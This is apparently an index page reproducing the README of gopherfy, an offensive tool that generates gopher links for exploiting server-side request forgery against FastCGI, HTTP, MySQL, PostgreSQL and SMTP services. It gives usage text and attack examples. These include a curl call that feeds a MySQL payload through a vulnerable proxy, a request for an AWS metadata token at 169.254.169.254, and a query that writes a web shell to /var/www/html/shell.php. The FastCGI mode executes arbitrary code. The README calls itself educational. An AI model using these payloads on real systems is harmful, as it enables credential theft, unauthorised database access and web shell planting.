Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.


https://github.com/hupe1980/gopherfy

Tool to generate gopher links for exploiting SSRF

exploit fastcgi gopher http mysql postgresql smtp ssrf


# gopherfy
![Build Status](https://github.com/hupe1980/gopherfy/workflows/build/badge.svg)
[![Go Reference](https://pkg.go.dev/badge/github.com/hupe1980/gopherfy.svg)](https://pkg.go.dev/github.com/hupe1980/gopherfy)
> Tool to generate gopher links for exploiting SSRF

```
curl http://example.org/ssrf/vuln/proxy?url=$(gopherfy mysql -e url -q "show databases;")
```

:warning: This is for educational purposes only. Don't try it on live servers!

## How to use
```
Tool to generate gopher links for exploiting SSRF

Usage:
  gopherfy [command]

Available Commands:
  completion  Generate the autocompletion script for the specified shell
  fastcgi     Generate fastcgi gopher link
  help        Help about any command
  http        Generate http gopher link
  mysql       Generate mysql gopher link
  postgres    Generate postgres gopher link
  smtp        Generate smtp gopher link

Flags:
  -e, --encoder string   the encoder to use. allowed: "base64", "url" or "none" (default "none")
  -h, --help             help for gopherfy
      --send             send the selector string
  -v, --version          version for gopherfy

Use "gopherfy [command] --help" for more information about a command.
```
## FastCGI
```
Generate fastcgi gopher link

Usage:
  gopherfy fastcgi [flags]

Flags:
  -a, --addr string   fastcgi address (default "127.0.0.1:9000")
  -c, --code string   code to execute (default "")
  -f, --file string   absolute php file path (default "/usr/local/lib/php/System.php")
  -h, --help          help for fastcgi

Global Flags:
  -e, --encoder string   the encoder to use. allowed: "base64", "url" or "none" (default "none")
      --send             send the selector string
```

## HTTP
```
Generate http gopher link

Usage:
  gopherfy http [flags]

Examples:
  gopherfy http -a 169.254.169.254:80 -p /latest/api/token -X PUT -H X-aws-ec2-metadata-token-ttl-seconds=21600

Flags:
  -a, --addr string             http address (default "127.0.0.1:80")
  -H, --header stringToString   http header value (key=value) (default [])
  -h, --help                    help for http
  -V, --http-version string     http protocol version (default "HTTP/1.0")
  -p, --path string             http path (default "/")
  -X, --request string          http request method (default "GET")
  -A, --user-agent string       http user agent (default "gopherfy")

Global Flags:
  -e, --encoder string   the encoder to use. allowed: "base64", "url" or "none" (default "none")
      --send             send the selector string
```

## MySQL
```
Generate mysql gopher link

Usage:
  gopherfy mysql [flags]

Examples:
  gopherfy mysql -q "SELECT '' INTO OUTFILE '/var/www/html/shell.php'"

Flags:
  -a, --addr string    mysql address (default "127.0.0.1:3306")
  -d, --db string      mysql database name
  -h, --help           help for mysql
  -q, --query string   mysql query
  -u, --user string    mysql username (default "root")

Global Flags:
  -e, --encoder string   the encoder to use. allowed: "base64", "url" or "none" (default "none")
      --send             send the selector string
```

## PostgreSQL
```
Generate postgres gopher link

Usage:
  gopherfy postgres [flags]

Flags:
  -a, --addr string    postgres address (default "127.0.0.1:5432")
  -d, --db string      postgres database name
  -h, --help           help for postgres
  -q, --query string   postgres query
  -u, --user string    postgres username (default "postgres")

Global Flags:
  -e, --encoder string   the encoder to use. allowed: "base64", "url" or "none" (default "none")
      --send             send the selector string
```
## License
[MIT](LICENCE)